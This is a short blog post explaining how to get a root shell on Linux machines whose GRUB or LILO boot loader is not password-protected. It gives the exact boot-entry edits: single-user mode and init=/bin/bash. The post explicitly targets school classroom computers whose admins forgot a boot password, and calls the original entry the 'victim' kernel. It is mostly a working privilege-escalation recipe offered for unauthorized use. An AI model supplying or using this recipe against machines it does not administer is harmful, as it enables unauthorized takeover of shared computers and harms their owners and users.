I will present a very easy but effective way to obtain a root account on a linux machine having a boot loader badly configured.
Sometimes [Often], in school classes, admins forget to protect grub with a password, so we will explore this weakness.
When you boot your computer, you’ve a prompt (Grub/Lilo), asking you for which kernel you want to boot on. If the bootloader doesn’t contain any password, you can press “e” (for edit) and edit the current boot definition:
(current)
title victim-kernel
root (hd0,0)
kernel /kernel-name root=/dev/hda3
to:
title supa-kernel
root (hd0,0)
kernel /kernel-name root=/dev/hda3
softlevel=single
init=/bin/bash
Will give you a shell prompt with root privileges… Sometimes, before you modify something, you’ve to remount the hard drive in read&write , instead of read-only.
If you have a lilo boot loader rather than a grub-loader, just do this:
image=/boot/kernel-name
label=supa-kernel
root=/dev/hda3
append=”1″
init=/bin/bash
and vice versa 
No Comments Yet
No comments yet.
Comments RSS TrackBack Identifier URI
Leave a comment
